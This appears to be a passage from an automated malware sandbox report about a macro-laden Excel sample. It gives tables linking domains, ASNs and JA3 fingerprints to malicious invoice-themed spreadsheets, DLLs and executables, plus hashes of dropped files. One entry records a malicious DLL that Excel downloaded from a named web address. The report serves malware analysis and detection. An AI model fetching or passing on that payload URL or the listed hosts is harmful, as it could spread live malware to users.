cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | Vessel details.doc | malicious | 104.18.11.39

ASN

Match | Associated Sample Name / URL | Detection | Context
GD-EMEA-DC-SXB1DE | HkNkyKl3uT.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | ceepq536n.zip.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | sample20210111-01.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV3867196801-20210111675616.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | hiytvys.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | l7rgi3xyd.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | ymuyks.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV9698791470-20210111920647.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | hy9x6wzip.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV7693947099-20210111388211.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | jufk0vrar.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | s3CRQNulKZ.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | DFR2154747.vbe | malicious | 85.25.93.233
GD-EMEA-DC-SXB1DE | r8a97.exe | malicious | 62.75.168.106
GD-EMEA-DC-SXB1DE | NKsplucdAu.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | lZVNh1BPxm.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | qG5E4q8Cv5.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | 990109.exe | malicious | 87.230.93.218
GD-EMEA-DC-SXB1DE | og0gax.dll | malicious | 62.138.14.216
OVHFR | HkNkyKl3uT.dll | malicious | 46.105.131.65
OVHFR | Doc_74657456348374.xlsx | malicious | 149.202.23.211
OVHFR | ceepq536n.zip.dll | malicious | 46.105.131.65
OVHFR | sample20210111-01.xlsm | malicious | 46.105.131.65
OVHFR | INV3867196801-20210111675616.xlsm | malicious | 46.105.131.65
OVHFR | sfk_setup.exe | malicious | 54.39.133.136
OVHFR | hiytvys.dll | malicious | 46.105.131.65
OVHFR | l7rgi3xyd.dll | malicious | 46.105.131.65
OVHFR | ymuyks.dll | malicious | 46.105.131.65
OVHFR | Client.vbs | malicious | 92.222.182.237
OVHFR | INV9698791470-20210111920647.xlsm | malicious | 46.105.131.65
OVHFR | hy9x6wzip.dll | malicious | 46.105.131.65
OVHFR | INV7693947099-20210111388211.xlsm | malicious | 46.105.131.65
OVHFR | jufk0vrar.dll | malicious | 46.105.131.65
OVHFR | Pioneercon Project Contract.exe | malicious | 51.195.53.221
OVHFR | Outstanding Payments.exe | malicious | 51.195.53.221
OVHFR | Quw3X5oAwe.exe | malicious | 51.83.208.157
OVHFR | H56P7iDwnJ.doc | malicious | 142.44.230.78
OVHFR | 11998704458248.exe | malicious | 54.37.160.157
OVHFR | Test.HTM | malicious | 145.239.131.60
SENTIANL | HkNkyKl3uT.dll | malicious | 5.100.228.233
SENTIANL | ceepq536n.zip.dll | malicious | 5.100.228.233
SENTIANL | sample20210111-01.xlsm | malicious | 5.100.228.233
SENTIANL | INV3867196801-20210111675616.xlsm | malicious | 5.100.228.233
                                                                                                                                hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                anthon.exeGet hashmaliciousBrowse
                                                                                                                                • 145.131.21.142
                                                                                                                                baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                plusnew.exeGet hashmaliciousBrowse
                                                                                                                                • 145.131.29.142
                                                                                                                                List-20200731-79226.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16
                                                                                                                                LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16
                                                                                                                                Rep_20200731.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
Match: eb88d0b3e1961a0562f006e5ce2a0b87
INV3867196801-20210111675616.xlsm | malicious | 77.220.64.37
INV9698791470-20210111920647.xlsm | malicious | 77.220.64.37
INV7693947099-20210111388211.xlsm | malicious | 77.220.64.37
Document74269.xls | malicious | 77.220.64.37
Document74269.xls | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xls | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xlsm | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xlsm | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xlsm | malicious | 77.220.64.37
1-Total New Invoices Monday Dec 14 2020.xlsm | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xlsm | malicious | 77.220.64.37
1 Total New Invoices-Monday December 14 2020.xlsm | malicious | 77.220.64.37
SecuriteInfo.com.Heur.15645.xlsm | malicious | 77.220.64.37
Statement_1857_of_12_09_2020.xlsm | malicious | 77.220.64.37
Statement_9505_of_12_09_2020.xlsm | malicious | 77.220.64.37
MSC printouts of outstanding as of 73221_12_09_2020.xlsm | malicious | 77.220.64.37
Invoice.29002611.doc | malicious | 77.220.64.37
MSC printouts of outstanding as of 64338_12_09_2020.xlsm | malicious | 77.220.64.37
MSC printouts of outstanding as of 41705_12_09_2020.xlsm | malicious | 77.220.64.37
printouts of outstanding as of 27212_12_11_2020.xlsm | malicious | 77.220.64.37

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
Process: C:\Windows\System32\DWWIN.EXE
File Type: data
Category: dropped
Size (bytes): 914
Entropy (8bit): 7.367371959019618
Encrypted: false
SSDEEP: 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5: E4A68AC854AC5242460AFD72481B2A44
SHA1: DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256: CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512: 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious: false
Reputation: moderate, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\regsvr32.exe
File Type: Microsoft Cabinet archive data, 58936 bytes, 1 file
Category: dropped
Size (bytes): 58936
Entropy (8bit): 7.994797855729196
Encrypted: true
SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5: E4F1E21910443409E81E5B55DC8DE774
SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious: false
Reputation: high, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Process: C:\Windows\System32\DWWIN.EXE
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 3.062651630993698
Encrypted: false
SSDEEP: 6:kKKLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:CLutWOxSW0zeYrsMlU/
MD5: EC88C03D6E1EB7B23DCB08444B01283D
SHA1: 71F62BEAD0E3E6B8EAFAD73D3602E036389EB285
SHA-256: A1777183381435728481E8341BE54FDFF04A4BDA6BB64E569FC379167E4AC8D4
SHA-512: 35D83A583E9956BA23F29900C51CB6F88D6D5743B98C43DAFC85428C458EF7F33D675DAB86FA122688942FC1D6A2F93BD358F51B48DA50CAF1EF03FF1D8CFA07
Malicious: false
Reputation: low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\regsvr32.exe
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.1231869637929037
Encrypted: false
SSDEEP: 6:kKinwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:pkPlE99SNxAhUegeT2
MD5: F24E45B5BC58337728355A1FA04DFBB1
SHA1: 1F1914527C128D6A3F66B347FF80ACFC9F3F34A0
SHA-256: 6CF7266DF387019A41C0CAF8C6CAA49A5434577C57134A704801477E8172DD62
SHA-512: F963ADA7D5F449655710F11E89A4B599AD7BFAD5FC2F6400A4DE7B95E8C4C1D1BA47D691D5CC1E96D007863E4396D506FA5DD2CD0489495241112974142625CF
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 318976
Entropy (8bit): 7.120104121741336
Encrypted: false
SSDEEP: 6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5: F317BDF94E5306AC0B02EDE9A263E36C
SHA1: 073D7B5C5896A2974C454A9BC21B097C19E8AFB3
SHA-256: D5CF6F2148848F36D4A55BBC791372189EDFFB6326D8A0BB9B8743FD25BF0C8F
SHA-512: A26EDB19B9D7FDA69DB767B20A08DD769F760115CC668494B18ACED009FE1B9D4DF0D5A2D0B94F1B13D808E461A4B7C19527EA3D6C61C9B5D17DF5263E78193F
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://wexfashion.com/k04qkvqu.zip

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F562CE8.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 363 x 234, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 2653
Entropy (8bit): 7.818766151665501
Encrypted: false
SSDEEP: 48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
MD5: 30D3FFA1E30B519FD9B1B839CC65C7BE
SHA1: 1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
SHA-256: 89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
SHA-512: 88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
Malicious: false
Reputation: low

                                                                                                                                Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88DFF5C3.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1408
Entropy (8bit):2.270567557934206
Encrypted:false
SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:40550DC2F9D56285FA529159B8F2C6A5
SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:false
Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0b90bebe\Report.wer
Process:C:\Windows\System32\DWWIN.EXE
File Type:data
Category:dropped
Size (bytes):15904
Entropy (8bit):3.720171397288092
Encrypted:false
SSDEEP:96:LiBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rO:NBKzFCEuhTlyZVa6LVaJa5GG
MD5:C0FDF878DDBA23452C0522DD98898423
SHA1:DEE79D22CB59614E14338A70745A6F5FDFC3C0AB
SHA-256:8BDF926423D889E70675B75B632C0614401BCF7BBF21D9345EC76605DF4C2ED0
SHA-512:23A08824D947FBFB129398299FAE440FE560C66DB5BD299DD95BF3027728817E4F6D4E1982360957BB5578887E943B9BE95BDA37EBEF5C6872E92F84FB81DD3D
Malicious:false
Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.0.0.4.8.2.0.7.4.6.9.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.0.0.4.9.9.0.7.8.7.2.7.7.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.e.6.e.a.1.-.5.4.9.1.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.e.6.e.a.0.-.5.4.9.1.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
C:\Users\user\AppData\Local\Temp\93EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):58702
Entropy (8bit):7.858362652853985
Encrypted:false
SSDEEP:1536:hq8RzggbLmCf6646CIKtzjM5jeEXxFVnsLNFqtM:hD1rmCM28jXEX/Vn+MM
MD5:8AC68DDB24B06F63E7DE6A63F7C0ADA4
SHA1:A5548CED2ECF287CCACB01BB58359DA34D93BB50
SHA-256:2755A1EF910C69828EEC69EE0D918DB19B8A9B359EA8D8B536700C09CFDDB917
SHA-512:2E4B345D5771C42BB3B26377A2B83EB36625F2C5B4547AC8827A23EFD05BFFD35E122788CC8F9C1736B803B99A2AB82189B0A4EB795E9FB9BD857A294AFF78E6
Malicious:false
Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\993414.cvr
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):1392
Entropy (8bit):3.2493177971203697
Encrypted:false
SSDEEP:24:zll/jUzQq3083f3V/Vl/8Ck6H0g6z4/HNwMNK1PjMZd4RXTdG/ntEFAlYJFBB:zll/YZ308v3mCk/8/H/KoP4hMt4PB
MD5:82E6FCED0AF2D4CB647F0BC81154E36A
SHA1:3E70CFBF4A0E9B101A5F9829EF31EB4EDF4B8DBF
SHA-256:109B7A17C0768291069E87C8803DF4D43E30E8DEB25F22EAA9303999AE8D558B
SHA-512:9C1AA7D7DDF9D4308061DB49C4DE0542F83FB4EA148ECD6FAC21135CA7978AEA9E0DA1BBA3C8E695816C2B3BA1460919A4F1677059BF910EE3748600F9BD2469
Malicious:false
Preview: MSQMx.........Q................g.........................W..........................................................................................`......EXCE........................................5...g.......;...........<...........A...........l...........................z...........................................................................................................................H.......................................b...........N...................YE..C...........F...........Q...........W.......j%...........%..............................................................+...........0...........:...........;...................r...........................................................(...........(.... ......i...:!..........n"...........".......%...".......%...".......%...".......%...".......%...".......%..7#..........?...t...(.......t...(...............................<...B............$../....................D../.......................$...$............$..n370.....D..
C:\Users\user\AppData\Local\Temp\Cab8641.tmp
Process:C:\Windows\SysWOW64\regsvr32.exe
File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:dropped
Size (bytes):58936
Entropy (8bit):7.994797855729196
Encrypted:true
SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:E4F1E21910443409E81E5B55DC8DE774
SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:false
